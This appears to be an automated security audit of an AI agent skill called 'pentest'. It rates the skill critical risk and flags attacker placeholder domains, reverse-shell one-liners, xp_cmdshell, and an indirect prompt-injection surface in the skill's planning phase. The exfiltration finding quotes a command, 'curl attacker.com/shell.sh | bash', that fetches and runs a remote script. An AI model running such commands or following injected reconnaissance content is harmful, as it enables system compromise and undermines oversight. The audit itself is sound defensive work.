pentest
Fail
Audited by Gen Agent Trust Hub on Mar 21, 2026
Risk Level: CRITICALDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- [DATA_EXFILTRATION]: Documentation files, specifically within the host-header and authentication guides, contain references to non-whitelisted and potentially risky domains such as
attacker-server.com,app.interactsh.com, andngrok.io. These domains are flagged by automated scanners for associations with phishing or OOB interaction testing. While intended as placeholders for security testing, they represent a data exposure surface. - [REMOTE_CODE_EXECUTION]: The reference library includes numerous examples of remote code execution techniques, such as piping remote scripts directly into bash or python interpreters. Furthermore, the skill contains obfuscated payloads using Base64 encoding to mask commands like
curl attacker.com/shell.sh | bashwithin theattacks/essential-skills/burp-suite/essential-skills-cheat-sheet.mdfile. - [COMMAND_EXECUTION]: Multiple documentation files detail high-risk command execution patterns, including the use of database system commands like
xp_cmdshelland various reverse shell one-liners across different languages (PHP, Python, Bash, Perl, Ruby). - [PROMPT_INJECTION]: The
pentestorchestrator defined inSKILL.mdhas an indirect prompt injection surface. During Phase 3 (Planning & Approval), the agent is instructed to analyze reconnaissance findings which are derived from untrusted external sources (e.g., target web headers, API documentation). The skill does not define explicit boundary markers or sanitization steps to prevent this untrusted content from influencing the generated test plans or agent behavior.
Recommendations
- Contains 5 malicious URL(s) - DO NOT USE
Audit Metadata